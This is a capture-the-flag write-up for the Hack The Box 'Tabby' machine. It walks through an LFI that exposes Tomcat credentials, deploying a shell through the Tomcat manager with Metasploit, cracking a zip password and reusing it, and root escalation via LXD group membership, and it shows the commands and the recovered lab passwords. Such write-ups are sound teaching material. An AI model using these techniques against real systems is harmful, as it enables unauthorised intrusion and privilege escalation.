Hackthebox tabby writeup

Hackthebox tabby writeup
Hackthebox tabby writeup


Hi every one this is my short and quick writeup on the tabby machine from hackthebox.

Difficulty Easy

Lesson learnt

1-Basic port Scan
2-LFI(Local file inclusion)
3-Tomcat file structure
4-cracking zip file password
5-Privilege escalation via LXD 

Steps involved

1-Port Scan
3-Exploiting tomcat
4-Cracking Zip file password
5-Reusing password(User flag)
6-Privilege escalation via LXD group

Commands involved

nmap -sC -sV -v -oN nmap
use exploit/multi/http/tomcat_mgr_deploy
python3 -c 'import pty; pty.spawn("/bin/sh")'
fcrackzip -v -D -p /usr/share/wordlists/rockyou.txt -u backup.zip
lxc image import ./apline-v3.10-x86_64-20191008_1227.tar.gz --alias myimage
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh

Port Scan

➜ tabby cat nmap
Nmap 7.80 scan initiated Sat Jun 20 21:29:13 2020 as: nmap -sC -sV -v -oN nmap
Nmap scan report for
Host is up (0.21s latency).
Not shown: 997 closed ports
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|http-favicon: Unknown favicon MD5: 338ABBB5EA8D80B9869555ECA253D49D | http-methods: | Supported Methods: GET HEAD POST OPTIONS
|http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Mega Hosting 8080/tcp open http Apache Tomcat | http-methods: | Supported Methods: OPTIONS GET HEAD POST
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done at Sat Jun 20 21:30:00 2020 -- 1 IP address (1 host up) scanned in 47.22 seconds

Let’s see what’s on port 80.

Hackthebox tabby writeup


After little testing I found LFI in the news .


So it was taking a parameter so I thought to test it with Local file inclusion

Hackthebox tabby writeup

And luckily it worked.


Hackthebox tabby writeup

Now we know that we can include our file.So now let’s see what files we can include .So let’s enumerate port 8080.

Hackthebox tabby writeup

So it is a tomcat service .

Got some interesting thing here .It says that password are in conf/tomcat-users.xml

Hackthebox tabby writeup

And on the other link I got this

Hackthebox tabby writeup

These are important lines from above three screen shots.

Tomcat is installed with CATALINA_HOME in /usr/share/tomcat9

After reading the Documentaion of the tomcat I came to know that tomcat-user.xml is in the CATALINA_HOME.

Now look at this line.

NOTE: For security reasons, using the manager webapp is restricted to users with role “manager-gui”. The host-manager webapp is restricted to users with role “admin-gui”. Users are defined in /etc/tomcat9/tomcat-users.xml.

By combining these and after some hit and trial i got the correct path which is .


It’s a xml file so Browser won’t show it .So either view page source or do it in burp.

Hackthebox tabby writeup

So now we have the creds .


Exploiting tomcat

While I was enumerated I came across a authenticated exploit for the tomcat.So let’s use these creds over there.

We can also do it using curl and creating a war payload.

You can view here for more info.I used metasploit .

msf5 exploit(multi/http/tomcat_mgr_deploy) > set HttpPassword $3cureP4s5w0rd123!
HttpPassword => $3cureP4s5w0rd123!
msf5 exploit(multi/http/tomcat_mgr_deploy) > set httpusername tomcat
httpusername => tomcat
msf5 exploit(multi/http/tomcat_mgr_deploy) > set path /manager/text/
path => /manager/text/
msf5 exploit(multi/http/tomcat_mgr_deploy) > set rhosts
rhosts =>
msf5 exploit(multi/http/tomcat_mgr_deploy) > set rport 8080
rport => 8080
msf5 exploit(multi/http/tomcat_mgr_deploy) > set target 1
target => 1
Hackthebox tabby writeup

And after many attempts it worked .

And we got the shell as tomcat and there was a user in home directory ash.

So we need to switch to him in order to get the user flag.

Hackthebox tabby writeup

Cracking zip file password

After a little enumeration I got a backup file.So I downloaded it.

But it was password protected .So we need to break the the password first .

fcrackzip -v -D -p /usr/share/wordlists/rockyou.txt -u backup.zip
Hackthebox tabby writeup

And we got the password successfully.

PASSWORD FOUND!!!!: pw == admin@it

Reusing password(User flag)

But nothing was there in the backup file.So I thought to reuse the password on the ash account.

tomcat@tabby:/var/lib/tomcat9$ su ash
su ash
Password: admin@it
Hackthebox tabby writeup

Privilege escalation via LXD group

So now we have the user flag let’s move to root .

Checking the id info .

Hackthebox tabby writeup

It says that ash is the member of the lxd group .

What’s LXD?

LXD is a next generation system container manager. It offers a user experience similar to virtual machines but using Linux containers instead.

It’s image based with pre-made images available for a wide number of Linux distributions and is built around a very powerful, yet pretty simple, REST API.

To get a better idea of what LXD is and what it does, you can try it online! Then if you want to run it locally, take a look at our getting started guide.

The LXD project was founded and is currently led by Canonical Ltd with contributions from a range of other companies and individual contributors.

after some research got an article visit it to see the steps in detail.

Hackthebox tabby writeup

Now let’s follow the same steps from the above article.

But first of all initialize it .

ash@tabby:~$ lxd init
lxd init
Would you like to use LXD clustering? (yes/no) [default=no]: yes
What name should be used to identify this node in the cluster? [default=tabby]:
What IP address or DNS name should be used to reach this node? [default=]:
Are you joining an existing cluster? (yes/no) [default=no]:
Setup password authentication on the cluster? (yes/no) [default=yes]:
Trust password for new clients: rana
Again: rana
Do you want to configure a new local storage pool? (yes/no) [default=yes]:

Getting root flag

Now we are good to go.

ash@tabby:~$ lxc init myimage ignite -c security.privileged=true
lxc init myimage ignite -c security.privileged=true
Creating ignite
ash@tabby:~$ lxc config device add ignite mydevice disk source=/root path=/mnt/root recursive=true
<ice disk source=/root path=/mnt/root recursive=true
Device mydevice added to ignite
ash@tabby:~$ lxc start ignite
lxc start ignite
ash@tabby:~$ lxc exec ignite /bin/sh
lxc exec ignite /bin/sh
Hackthebox tabby writeup

And here we got our root flag.

we can also get the ssh key to get a permanent shell.

Hackthebox tabby writeup

Thanks for reading have a nice day.

How useful was this post?

Click on a star to rate it!

Average rating 4.6 / 5. Vote count: 10

No votes so far! Be the first to rate this post.

As you found this post useful...

Follow us on social media!

We are sorry that this post was not useful for you!

Let us improve this post!

Tell us how we can improve this post?

1 Comment

  1. Ankush

    Nice write-up broπŸ‘ŒπŸ‘ŒπŸ˜

Leave a Reply

Your email address will not be published. Required fields are marked *